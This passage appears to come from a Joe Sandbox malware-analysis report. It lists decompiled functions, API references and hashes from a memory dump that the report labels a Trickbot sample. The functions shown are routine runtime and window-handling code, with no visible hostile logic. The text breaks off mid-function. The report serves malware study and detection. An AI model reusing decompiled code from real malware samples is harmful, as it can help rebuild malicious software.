				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x44d0a0 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x44cfa0[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x44cfa4;
					while(1) {
						_t69 = E0040511B(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x44d0a0 =  *0x44d0a0 + 0x20;
						__eflags =  *0x44d0a0;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x44d0a0 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x44d0a0; // 0x20
					goto L18;
				}
			}

0x004092f5
0x004092fa
0x004092fe
0x00409303
0x00409304
0x0040930a
0x00409314
0x00409314
0x0040931a
0x0040931e
0x00409322
0x00409325
0x00409329
0x0040932d
0x00409332
0x00409335
0x00409335
0x00409340
0x00409346
0x0040934b
0x00409422
0x00409422
0x00409422
0x00409424
0x00409424
0x0040942a
0x0040942d
0x00409431
0x00409434
0x00409483
0x00409483
0x00409483
0x00000000
0x00409483
0x00409436
0x00409438
0x0040943c
0x00409448
0x0040944a
0x0040944a
0x0040943e
0x00409440
0x00409440
0x00409454
0x00409456
0x00409459
0x00409472
0x00409472
0x0040945b
0x0040945c
0x00409462
0x00409464
0x00000000
0x00000000
0x00409466
0x0040946b
0x0040946d
0x00409470
0x00409478
0x0040947b
0x0040947d
0x0040947d
0x00000000
0x0040947b
0x00000000
0x00409470
0x00409487
0x00409487
0x00409488
0x00409488
0x0040949d
0x0040949d
0x00409351
0x00409354
0x00409356
0x00000000
0x00000000
0x0040935c
0x0040935e
0x00409364
0x0040936c
0x0040936e
0x00409370
0x00409370
0x00409372
0x00409378
0x004093d0
0x004093d0
0x004093d2
0x004093d4
0x00000000
0x00000000
0x00000000
0x00000000
0x004093d6
0x004093d6
0x004093d9
0x004093db
0x004093de
0x00000000
0x00000000
0x004093e0
0x004093e2
0x004093e4
0x00000000
0x00000000
0x004093e6
0x004093e8
0x004093f5
0x004093fc
0x004093fc
0x00409409
0x00409411
0x00409415
0x00000000
0x00409415
0x004093eb
0x004093f1
0x004093f3
0x00000000
0x00000000
0x00000000
0x00409418
0x00409418
0x0040941c
0x0040941d
0x0040941e
0x0040941e
0x00000000
0x0040937a
0x0040937a
0x0040937f
0x00409384
0x00409389
0x0040938c
0x00000000
0x00000000
0x0040938e
0x0040938e
0x00409395
0x00409397
0x00409397
0x0040939d
0x0040939d
0x0040939f
0x00000000
0x00000000
0x004093a1
0x004093a5
0x004093a8
0x004093ac
0x004093b2
0x004093b5
0x004093b5
0x004093bd
0x004093c0
0x004093c6
0x00000000
0x00000000
0x00000000
0x004093c8
0x004093ca
0x00000000
0x004093ca

APIs

GetStartupInfoA.KERNEL32(?), ref: 00409340
GetFileType.KERNEL32(00000480), ref: 004093EB
GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 0040944E
GetFileType.KERNEL32(00000000), ref: 0040945C
SetHandleCount.KERNEL32 ref: 00409493

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 0797085bee01148bc2e14a3fc896a74d53ce77f0b5d0c0a5eef106b4e791e520
Instruction ID: 598ca91431e2b694c3ba0771bf903f2c3e2c039eb7f80bf9f392c62e7bcf0086
Opcode Fuzzy Hash: 0797085bee01148bc2e14a3fc896a74d53ce77f0b5d0c0a5eef106b4e791e520
Instruction Fuzzy Hash: B3511B315042058FD7248F28D88476B77E0FB56728F28467ED8A2E73E2D7789C06CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004345A6, Relevance: 7.6, APIs: 5, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004345A6(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v20;
				void* __ebp;
				intOrPtr* _t51;
				intOrPtr _t54;
				int _t58;
				signed int _t65;
				int _t77;
				void* _t79;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				int _t84;
				void* _t88;
				int _t91;
				signed int _t100;
				signed int _t104;
				void* _t109;
				struct tagRECT* _t110;

				_t88 = __ecx;
				_t104 = _a4 + _a4 * 4 << 3;
				_t109 = _t104 +  *((intOrPtr*)(__ecx + 0x90));
				_t51 = E00434522(__ecx, __edx, __eflags,  &_v20);
				_v12 =  *_t51;
				_v8 =  *((intOrPtr*)(_t51 + 4));
				_t91 =  *(_t109 + 0x24);
				_t100 = 0 |  *(_t109 + 0x20) - _t91 < 0x00000000;
				_t54 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t54 == 0) {
					 *(_t109 + 0x18) =  *(_t109 + 0x20);
					 *(_t109 + 0x1c) =  *(_t109 + 0x24);
					L12:
					_v20 = MulDiv( *(_t109 + 0x10),  *(_t109 + 0x18),  *(_t109 + 0x1c));
					_t58 = MulDiv( *(_t109 + 0x14),  *(_t109 + 0x18),  *(_t109 + 0x1c));
					_t110 = _t104 +  *((intOrPtr*)(_t88 + 0x90));
					SetRect(_t110, 8, 8, _v20 + 0xb, _t58 + 0xb);
					if( *((intOrPtr*)(_t88 + 0xec)) != 0) {
						_push(0x43b688);
						_t65 = _t110->right - _t110->left + 0x10;
						__eflags = _t65;
						_push( &_v12);
						_push(_t110->bottom - _t110->top + 0x10);
						_push(_t65);
						_push(1);
						return E0041FDB2(_t88, _t65);
					}
					asm("cdq");
					asm("cdq");
					_t77 = OffsetRect(_t110, (_v12 - _t110->right - _t110->left - _t100 >> 1) - 1, (_v8 - _t110->bottom - _t110->top - _t100 >> 1) - 1);
					if(_a4 != 1) {
						return _t77;
					}
					return OffsetRect(_t110,  *(_t88 + 0xfc), 0);
				}
				_t79 = _t54 - 1;
				if(_t79 == 0) {
					__eflags = _t100;
					 *(_t109 + 0x1c) = _t91;
					_t80 =  *(_t109 + 0x20);
					if(_t100 == 0) {
						_t82 = _t80 + _t80 * 2 - _t91;
					} else {
						_t82 = _t80 + _t91;
						__eflags = _t82;
					}
					asm("cdq");
					_t83 = _t82 - _t100;
					__eflags = _t83;
					_t84 = _t83 >> 1;
					L9:
					 *(_t109 + 0x18) = _t84;
					goto L12;
				}
				if(_t79 != 1) {
					goto L12;
				}
				if(_t100 == 0) {
					 *(_t109 + 0x1c) = _t91;
					_t84 = ( *(_t109 + 0x20) << 1) -  *(_t109 + 0x24);
				} else {
					_t84 = 1;
					 *(_t109 + 0x1c) = _t84;
				}
				goto L9;
			}

0x004345b2
0x004345bd
0x004345c0
0x004345c7
0x004345d0
0x004345d6
0x004345d9
0x004345e5
0x004345e8
0x004345eb
0x0043462c
0x00434632
0x00434635
0x00434647
0x00434650
0x00434666
0x0043466e
0x0043467b
0x004346ca
0x004346d2
0x004346d2
0x004346d5
0x004346d6
0x004346d7
0x004346d8
0x00000000
0x004346dc
0x0043468d
0x0043469f
0x004346a7
0x004346ad
0x004346e5
0x004346e5
0x00000000
0x004346b8
0x004345ed
0x004345ee
0x0043460c
0x0043460e
0x00434611
0x00434614
0x00434625
0x00434616
0x00434616
0x00434616
0x00434616
0x00434618
0x00434619
0x00434619
0x0043461b
0x0043461d
0x0043461d
0x00000000
0x0043461d
0x004345f1
0x00000000
0x00000000
0x004345f5
0x004345ff
0x00434607
0x004345f7
0x004345f9
0x004345fa
0x004345fa
0x00000000

APIs

MulDiv.KERNEL32(?,?,?), ref: 0043463E
MulDiv.KERNEL32(?,?,?), ref: 00434650
SetRect.USER32(?,00000008,00000008,?,-0000000B), ref: 0043466E
OffsetRect.USER32(?,?,?), ref: 004346A7
OffsetRect.USER32(?,?,00000000), ref: 004346B8

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$Offset
String ID:
API String ID: 3858320380-0
Opcode ID: d7b40c23134d21506fe140c2f1d7b9203cb452ee1dcb87c8299ecca9c7e817ae
Instruction ID: b37095638a5e47dc748724b199ef50741266613d0d41d163cfff4e1f0d1d9786
Opcode Fuzzy Hash: d7b40c23134d21506fe140c2f1d7b9203cb452ee1dcb87c8299ecca9c7e817ae
Instruction Fuzzy Hash: 7B418A71600A05AFC724CF6CC945AAABBF5FB88300F048A2EE986D7655C734F905CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDB2, Relevance: 7.6, APIs: 5, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041FDB2(void* __ecx, void* __eflags) {
				struct tagPOINT* _t76;
				long* _t78;
				long* _t81;
				struct tagPOINT* _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				int _t87;
				struct tagPOINT* _t97;
				signed int _t108;
				void* _t123;
				void* _t125;

				E00405340(E00437D64, _t125);
				_t123 = __ecx;
				_push(0);
				 *(_t125 - 0x10) =  *(__ecx + 0x40);
				 *(__ecx + 0x40) =  *(_t125 + 8);
				 *(__ecx + 0x44) =  *(_t125 + 0xc);
				 *(__ecx + 0x48) =  *(_t125 + 0x10);
				E004215AA(_t125 - 0x24, __eflags);
				 *(_t125 - 4) =  *(_t125 - 4) & 0x00000000;
				E0042101E(_t125 - 0x24,  *(__ecx + 0x40));
				_t76 = __ecx + 0x4c;
				_t76->x =  *(__ecx + 0x44);
				_t76->y =  *(__ecx + 0x48);
				LPtoDP( *(_t125 - 0x1c), _t76, 1);
				_t78 =  *(_t125 + 0x14);
				_t97 = __ecx + 0x54;
				_t97->x =  *_t78;
				_t97->y = _t78[1];
				LPtoDP( *(_t125 - 0x1c), _t97, 1);
				_t81 =  *(_t125 + 0x18);
				_t82 = __ecx + 0x5c;
				_t82->x =  *_t81;
				_t82->y = _t81[1];
				LPtoDP( *(_t125 - 0x1c), _t82, 1);
				_t84 =  *(__ecx + 0x50);
				if(_t84 < 0) {
					 *(__ecx + 0x50) =  ~_t84;
				}
				_t85 =  *(_t123 + 0x58);
				if(_t85 < 0) {
					 *(_t123 + 0x58) =  ~_t85;
				}
				_t86 =  *(_t123 + 0x60);
				_t133 = _t86;
				if(_t86 < 0) {
					 *(_t123 + 0x60) =  ~_t86;
				}
				 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
				_t87 = E0042161C(_t125 - 0x24, _t133);
				_t108 = 0xa;
				if(_t97->x == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x4c) / _t108;
					_t97->x = _t87;
				}
				if( *(_t123 + 0x58) == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x50) / _t108;
					 *(_t123 + 0x58) = _t87;
				}
				if( *(_t123 + 0x5c) == 0) {
					asm("cdq");
					_t87 = _t97->x / _t108;
					 *(_t123 + 0x5c) = _t87;
				}
				if( *(_t123 + 0x60) == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x58) / _t108;
					 *(_t123 + 0x60) = _t87;
				}
				if( *(_t123 + 0x1c) != 0) {
					E00420207(_t123);
					_t87 =  *(_t125 - 0x10);
					if(_t87 !=  *((intOrPtr*)(_t123 + 0x40))) {
						_t87 = InvalidateRect( *(_t123 + 0x1c), 0, 1);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t125 - 0xc));
				return _t87;
			}

0x0041fdb7
0x0041fdc1
0x0041fdc4
0x0041fdcc
0x0041fdd2
0x0041fdd8
0x0041fdde
0x0041fde1
0x0041fde9
0x0041fdf0
0x0041fdfe
0x0041fe07
0x0041fe0c
0x0041fe0f
0x0041fe11
0x0041fe14
0x0041fe22
0x0041fe24
0x0041fe27
0x0041fe29
0x0041fe33
0x0041fe3a
0x0041fe3c
0x0041fe3f
0x0041fe41
0x0041fe46
0x0041fe4a
0x0041fe4a
0x0041fe4d
0x0041fe52
0x0041fe56
0x0041fe56
0x0041fe59
0x0041fe5c
0x0041fe5e
0x0041fe62
0x0041fe62
0x0041fe65
0x0041fe6c
0x0041fe76
0x0041fe77
0x0041fe7e
0x0041fe7f
0x0041fe81
0x0041fe81
0x0041fe87
0x0041fe8e
0x0041fe8f
0x0041fe91
0x0041fe91
0x0041fe99
0x0041fe9f
0x0041fea0
0x0041fea2
0x0041fea2
0x0041fea8
0x0041fead
0x0041feae
0x0041feb0
0x0041feb0
0x0041feb6
0x0041feba
0x0041febf
0x0041fec5
0x0041fecd
0x0041fecd
0x0041fec5
0x0041fed9
0x0041fee1

APIs

__EH_prolog.LIBCMT ref: 0041FDB7

Part of subcall function 004215AA: __EH_prolog.LIBCMT ref: 004215AF
Part of subcall function 004215AA: GetWindowDC.USER32(?), ref: 004215D8

Part of subcall function 0042101E: SetMapMode.GDI32(?,?), ref: 00421037
Part of subcall function 0042101E: SetMapMode.GDI32(?,?), ref: 00421045

LPtoDP.GDI32(?,?,00000001), ref: 0041FE0F
LPtoDP.GDI32(?,?,00000001), ref: 0041FE27
LPtoDP.GDI32(?,?,00000001), ref: 0041FE3F
InvalidateRect.USER32(?,00000000,00000001), ref: 0041FECD

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prologMode$InvalidateRectWindow
String ID:
API String ID: 2422810626-0
Opcode ID: 6c6b6390418f33674b7f9665b9d906266f332e391b03e1505dbdd6c9eeeeb077
Instruction ID: 8c75bdfb8851e5d1ca44770e13910a47d00e78528ca0003b85b34d38e4a0621c
Opcode Fuzzy Hash: 6c6b6390418f33674b7f9665b9d906266f332e391b03e1505dbdd6c9eeeeb077
Instruction Fuzzy Hash: 31410270A00B19DFCB24DF6AC480A9AB7F5BF58308F10486EE58697B61D7B5E845CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00426985, Relevance: 7.6, APIs: 5, Instructions: 102
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00426985(intOrPtr* __ecx, intOrPtr _a4) {
				struct tagPOINT _v12;
				short _t29;
				signed int _t30;
				intOrPtr _t31;
				int _t32;
				int _t36;
				long _t37;
				signed int _t48;
				void* _t52;
				void* _t53;
				void* _t54;
				intOrPtr _t55;
				void* _t56;
				void* _t57;
				signed int _t60;
				intOrPtr* _t63;

				_push(__ecx);
				_push(__ecx);
				_t63 = __ecx;
				GetCursorPos( &_v12);
				_t29 = GetKeyState(0x11);
				_t30 = 0;
				_t60 = ((0 | _t29 >= 0x00000000) - 0x00000001 & 0xfffffff1) + 0x10;
				_t52 = _a4 - 0xd;
				if(_t52 == 0) {
					_t31 =  *_t63;
					_push(1);
					goto L28;
				} else {
					_t53 = _t52 - 0xe;
					if(_t53 == 0) {
						_t31 =  *_t63;
						_push(0);
						L28:
						_t32 =  *((intOrPtr*)(_t31 + 0x11c))();
					} else {
						_t54 = _t53 - 0xa;
						if(_t54 == 0) {
							_t48 = 0xffffffff;
							goto L11;
						} else {
							_t56 = _t54 - 1;
							if(_t56 == 0) {
								_t30 = 0xffffffff;
								goto L11;
							} else {
								_t57 = _t56 - 1;
								if(_t57 == 0) {
									_t48 = 1;
									goto L11;
								} else {
									if(_t57 == 1) {
										_t30 = 1;
										L11:
										_t55 =  *((intOrPtr*)(_t63 + 0xc0));
										if(_t55 == 1 || _t55 >= 0x65 && _t55 <= 0x73) {
											_t48 = 0;
										}
										if(_t55 == 2 || _t55 >= 0xc9 && _t55 <= 0xd7) {
											_t30 = 0;
										}
										_v12.y = _v12.y + _t30 * _t60;
										_v12.x = _v12.x + _t48 * _t60;
										ScreenToClient( *(_t63 + 0x1c),  &_v12);
										_t36 =  *((intOrPtr*)(_t63 + 0x94));
										if(_v12.y < _t36) {
											L21:
											_v12.y = _t36;
										} else {
											_t36 =  *((intOrPtr*)(_t63 + 0x9c));
											if(_v12.y > _t36) {
												goto L21;
											}
										}
										_t37 =  *(_t63 + 0x90);
										if(_v12.x < _t37) {
											L24:
											_v12.x = _t37;
										} else {
											_t37 =  *(_t63 + 0x98);
											if(_v12.x > _t37) {
												goto L24;
											}
										}
										ClientToScreen( *(_t63 + 0x1c),  &_v12);
										_t32 = SetCursorPos(_v12, _v12.y);
									} else {
										_t32 = E004187B4(_t63);
									}
								}
							}
						}
					}
				}
				return _t32;
			}

0x00426988
0x00426989
0x0042698f
0x00426992
0x0042699a
0x004269ac
0x004269b4
0x004269b8
0x004269bb
0x00426a90
0x00426a92
0x00000000
0x004269c1
0x004269c1
0x004269c4
0x00426a8a
0x00426a8c
0x00426a94
0x00426a96
0x004269ca
0x004269ca
0x004269cd
0x004269f3
0x00000000
0x004269cf
0x004269cf
0x004269d0
0x004269ee
0x00000000
0x004269d2
0x004269d2
0x004269d3
0x004269eb
0x00000000
0x004269d5
0x004269d6
0x004269e6
0x004269f6
0x004269f6
0x004269ff
0x00426a0b
0x00426a0b
0x00426a10
0x00426a22
0x00426a22
0x00426a2a
0x00426a2d
0x00426a37
0x00426a3d
0x00426a46
0x00426a53
0x00426a53
0x00426a48
0x00426a48
0x00426a51
0x00000000
0x00000000
0x00426a51
0x00426a56
0x00426a5f
0x00426a6c
0x00426a6c
0x00426a61
0x00426a61
0x00426a6a
0x00000000
0x00000000
0x00426a6a
0x00426a76
0x00426a82
0x004269d8
0x004269da
0x004269da
0x004269d6
0x004269d3
0x004269d0
0x004269cd
0x004269c4
0x00426a9f

APIs

GetCursorPos.USER32(?), ref: 00426992
GetKeyState.USER32(00000011), ref: 0042699A
ScreenToClient.USER32(?,?), ref: 00426A37
ClientToScreen.USER32(?,?), ref: 00426A76
SetCursorPos.USER32(?,?), ref: 00426A82

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ClientCursorScreen$State
String ID:
API String ID: 3982492586-0
Opcode ID: f1df2e6c66b737ac4e508868f90e8d2a9009531a7fc04688ba6ab731cb3bb3c3
Instruction ID: 9f0fe253b9640e6fb30dd2b8f13d62a3ee5c7078030d50b97a68578ead713894
Opcode Fuzzy Hash: f1df2e6c66b737ac4e508868f90e8d2a9009531a7fc04688ba6ab731cb3bb3c3
Instruction Fuzzy Hash: 5D31D871B00515DFCB288F68E945AAE7BB6EB41310FA5C12FE103E66D4DA795D81C708

Uniqueness

Uniqueness Score: -1.00%

Function 00425D3C, Relevance: 7.6, APIs: 5, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00425D3C(struct HDWP__** _a4, intOrPtr* _a8, long _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				struct tagRECT _v20;
				struct tagRECT _v36;
				void* __ebp;
				long _t27;
				int _t39;
				intOrPtr* _t52;
				intOrPtr _t53;
				void* _t63;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t70;
				void* _t76;

				_t52 = _a8;
				_t63 = 0;
				_t68 = _a24;
				_t67 = _a20;
				if(_a28 != 0) {
					_push(1);
					_pop(0);
					if(_t67 > 0 && _t68 > 0) {
					}
					asm("sbb edx, edx");
					asm("sbb eax, eax");
					E0041B6A3(_t52, 0x1000000, 0x800000, _t63);
					_t63 = 0;
				}
				_t27 = _a12;
				_t53 = _a16;
				_v20.left = _t27;
				_v20.top = _t53;
				_t76 =  *0x44b354 - _t63; // 0x1
				_v20.right = _t27 + _t67;
				_v20.bottom = _t53 + _t68;
				if(_t76 == 0) {
					if(_a28 == _t63) {
						 *((intOrPtr*)( *_t52 + 0x60))( &_v20, _t63);
					} else {
						InflateRect( &_v20, 1, 1);
					}
				}
				if((E0041B689(_t52) & 0x00000002) != 0 || E0041C5C7(_t52, 0x43b880) != 0) {
					InflateRect( &_v20,  *0x44b308,  *0x44b30c);
				}
				GetWindowRect( *(_t52 + 0x1c),  &_v36);
				E0042147E(E0041884D(_t70, GetParent( *(_t52 + 0x1c))),  &_v36);
				_t39 = EqualRect( &_v20,  &_v36);
				if(_t39 != 0) {
					return _t39;
				} else {
					return E0041A3D0(_a4,  *(_t52 + 0x1c),  &_v20);
				}
			}

0x00425d43
0x00425d46
0x00425d4c
0x00425d50
0x00425d53
0x00425d55
0x00425d57
0x00425d5a
0x00425d5a
0x00425d67
0x00425d72
0x00425d7f
0x00425d84
0x00425d84
0x00425d86
0x00425d89
0x00425d8c
0x00425d8f
0x00425d96
0x00425da2
0x00425da5
0x00425da8
0x00425dad
0x00425dc4
0x00425daf
0x00425db7
0x00425db7
0x00425dad
0x00425dd1
0x00425df3
0x00425df3
0x00425dfc
0x00425e17
0x00425e24
0x00425e2c
0x00425e41
0x00425e2e
0x00000000
0x00425e38

APIs

InflateRect.USER32(?,00000001,00000001), ref: 00425DB7
InflateRect.USER32(?), ref: 00425DF3
GetWindowRect.USER32(?,?), ref: 00425DFC
GetParent.USER32(?), ref: 00425E05
EqualRect.USER32(?,?), ref: 00425E24

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$Inflate$EqualParentWindow
String ID:
API String ID: 596032063-0
Opcode ID: 97d91a57028c182f0ba147137f26a49a1dd616e8e2810dd6ad460fb37f09a6c1
Instruction ID: fd402f18dda591d2256a94b4b3bc6b3b601ca0d566fefe5c636549cf34400164
Opcode Fuzzy Hash: 97d91a57028c182f0ba147137f26a49a1dd616e8e2810dd6ad460fb37f09a6c1
Instruction Fuzzy Hash: B4317E72A00629ABCF04DFA5EC45AFE77A9EF88300F44843EF901E7251DB38D8458B58

Uniqueness

Uniqueness Score: -1.00%

Function 00424D26, Relevance: 7.6, APIs: 5, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00424D26(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, RECT* _a12) {
				struct tagRECT _v20;
				intOrPtr _t18;
				intOrPtr _t33;

				_t43 = _a4;
				if(_a4 != 0) {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t18 = _a8;
					__eflags = _t18;
					if(_t18 == 0) {
						__eflags =  *0x44b354; // 0x1
						if(__eflags == 0) {
							L9:
							E0042CB2D( &_v20,  *0x44b328,  *0x44b324);
							InflateRect( &_v20, 0xffffffff, 0xffffffff);
							L10:
							_push( *0x44b320);
							return E0042CAB7(_t43,  &_v20);
						}
						E0042CB2D( &_v20,  *0x44b320,  *0x44b330);
						InflateRect( &_v20, 0xffffffff, 0xffffffff);
						E0042CB2D( &_v20,  *0x44b328,  *0x44b324);
						InflateRect( &_v20, 0xffffffff, 0xffffffff);
						goto L10;
					}
					_t33 = _t18 - 1;
					__eflags = _t33;
					if(_t33 == 0) {
						__eflags =  *0x44b354; // 0x1
						if(__eflags != 0) {
							goto L10;
						}
						goto L9;
					}
					__eflags = _t33 != 0;
					if(_t33 != 0) {
						goto L10;
					}
					E0042CB2D( &_v20,  *0x44b324,  *0x44b328);
					InflateRect( &_v20, 0xffffffff, 0xffffffff);
					return E0042CB2D( &_v20,  *0x44b330,  *0x44b320);
				}
				return RedrawWindow( *(__ecx + 0x1c), _a12, 0, 0x41);
			}

0x00424d2d
0x00424d35
0x00424d55
0x00424d56
0x00424d57
0x00424d58
0x00424d59
0x00424d59
0x00424d5c
0x00424dae
0x00424db4
0x00424e08
0x00424e1a
0x00424e27
0x00424e2d
0x00424e2d
0x00000000
0x00424e39
0x00424dc8
0x00424ddb
0x00424def
0x00424dfc
0x00000000
0x00424dfc
0x00424d5e
0x00424d5e
0x00424d5f
0x00424e00
0x00424e06
0x00000000
0x00000000
0x00000000
0x00424e06
0x00424d66
0x00424d67
0x00000000
0x00000000
0x00424d7f
0x00424d8c
0x00000000
0x00424da4
0x00000000

APIs

RedrawWindow.USER32(00000041,?,00000000,00000041), ref: 00424D40
InflateRect.USER32(?,000000FF,000000FF), ref: 00424D8C

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: InflateRectRedrawWindow
String ID:
API String ID: 3190756164-0
Opcode ID: 328025632785f1a38ed19f569bb753ad3dc359ba1c4c34850189f68c1b46e62e
Instruction ID: 24787cd3d30c62034af445ddf4f71539a3e1e5f70854aa87256fd70180343953
Opcode Fuzzy Hash: 328025632785f1a38ed19f569bb753ad3dc359ba1c4c34850189f68c1b46e62e
Instruction Fuzzy Hash: A8315075A0022EABDF05DFA5AC45CBEB769FB49324794063AF930A31E0DB35D805CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041AEEF, Relevance: 7.6, APIs: 5, Instructions: 91
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041AEEF(void* __ebx, intOrPtr __ecx, void* __eflags) {
				void* _t31;
				signed int _t42;
				struct HWND__* _t62;
				void* _t64;

				E00405340(E00437864, _t64);
				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
				E0041BBAB(_t64 - 0x38);
				E0041842C(_t64 - 0x74);
				 *(_t64 - 4) = 0;
				_t62 = GetTopWindow( *(__ecx + 0x1c));
				if(_t62 != 0) {
					do {
						 *(_t64 - 0x58) = _t62;
						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
						_push(_t62);
						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x74;
						if(E00418874() == 0 || E0041BA05(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
							if(E0041BA05( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
								_t46 =  *((intOrPtr*)(_t64 + 0xc));
								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
									if((SendMessageA( *(_t64 - 0x58), 0x87, 0, 0) & 0x00000020) == 0) {
